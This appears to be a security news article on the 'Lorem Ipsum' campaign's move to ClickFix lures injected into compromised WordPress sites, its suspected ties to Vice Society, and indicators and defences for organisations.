A malware campaign known informally as "Lorem Ipsum" — named for the Latin placeholder text used in its social engineering lures — has evolved its delivery methodology, pivoting to ClickFix-style attacks distributed through a network of compromised WordPress sites, according to new analysis published Monday.
The campaign's infrastructure and techniques bear similarities to those associated with Vice Society, a ransomware and data extortion group known for targeting education, healthcare, and other sectors. While attribution remains preliminary, researchers say the overlaps are significant enough to warrant the connection.
What Is the Lorem Ipsum Campaign?
The Lorem Ipsum campaign is a threat actor operation that uses social engineering lures — often featuring placeholder-style text designed to prompt victims into taking a specific action — to deliver malware payloads. What sets this campaign apart is its frequent infrastructure reuse of compromised legitimate websites, particularly WordPress installations, as staging grounds for payload delivery and victim redirection.
The campaign has historically relied on multiple delivery methods, but the latest iteration shows a deliberate pivot toward ClickFix as its primary infection vector.
ClickFix: The New Delivery Method
ClickFix is a social engineering technique that has seen explosive adoption among threat actors in 2026. The attack typically proceeds as follows:
- A victim visits a compromised or malicious website
- A pop-up or overlay appears, typically impersonating a browser error, CAPTCHA verification, or software update prompt
- The user is instructed to click a button labeled something like "Fix," "Verify," or "Update"
- Clicking copies a malicious command (often a PowerShell one-liner) to the clipboard
- The victim is then instructed to open the Windows Run dialog (
Win+R) and paste the command - The pasted command executes, downloading and running a malware payload
The technique is effective precisely because it hijacks legitimate user actions — running a command from the Run dialog is something technically proficient users do regularly. The social engineering prompt is designed to make the action feel routine rather than suspicious.
In the Lorem Ipsum campaign, attackers are injecting ClickFix overlays into compromised WordPress sites, leveraging the large installed base of WordPress to reach a broad pool of potential victims.
Vice Society Connection
Researchers noted several technical and operational similarities between the Lorem Ipsum campaign infrastructure and known Vice Society activity:
- Similar C2 infrastructure patterns — Overlapping IP ranges and domain registration patterns
- Targeting profile — The victim industries align with Vice Society's historical focus areas
- Post-exploitation tooling — File encryption and data exfiltration tools observed in Lorem Ipsum infections share code characteristics with Vice Society-affiliated malware
Vice Society has historically operated as both a ransomware group and a data extortion actor — encrypting victim files and threatening to publish stolen data if ransoms go unpaid. The group is known for targeting organizations with limited cybersecurity resources, particularly in the education and healthcare sectors.
If the Vice Society attribution is confirmed, it would indicate the group is actively updating its initial access playbook to incorporate trending social engineering techniques, a pattern consistent with how sophisticated ransomware groups adapt to evolving defenses.
WordPress as an Attack Enabler
The campaign's use of compromised WordPress sites as delivery infrastructure underscores a persistent threat to the WordPress ecosystem. WordPress-powered sites are frequently targeted for compromise and used as:
- Phishing and payload hosting — Trusted domains that are less likely to be blocked by web filters
- Redirect chains — Passing traffic through multiple legitimate-looking domains before reaching the malicious payload
- ClickFix injection points — Injecting malicious JavaScript overlays into legitimate page content
Site owners running outdated WordPress installations, themes, or plugins remain particularly vulnerable to compromise. Once a site is infected, it may be used in campaigns for extended periods without the site owner's awareness.
Indicators and Defense
Organizations should watch for the following indicators associated with ClickFix-style campaigns:
- Unexpected pop-up overlays on visited websites prompting clipboard interaction or Run dialog usage
- PowerShell one-liners appearing in clipboard after visiting unfamiliar sites
- Outbound connections to newly registered or suspicious domains following browsing activity
- Unusual process spawning from
explorer.exeorcmd.exeinvolving PowerShell with encoded or downloaded commands
Defensive recommendations:
- Disable clipboard-based attack vectors where possible — Group Policy can restrict the Windows Run dialog in managed environments
- Deploy script execution controls — PowerShell Constrained Language Mode, AppLocker, or Windows Defender Application Control
- WordPress hardening — Keep WordPress core, themes, and all plugins updated; enable file integrity monitoring
- User awareness training — Educate users that legitimate websites never require them to manually run commands to fix errors
- Web filtering — Block newly registered domains and enforce safe browsing policies
Key Takeaways
- The Lorem Ipsum campaign has pivoted to ClickFix delivery via compromised WordPress sites
- The campaign shows potential links to Vice Society, a known ransomware and extortion group
- ClickFix attacks are highly effective because they leverage victim action rather than exploiting technical vulnerabilities
- WordPress site owners should audit for compromise and ensure all components are updated
- Users should be trained to recognize ClickFix lures — no legitimate site asks you to run clipboard commands to fix errors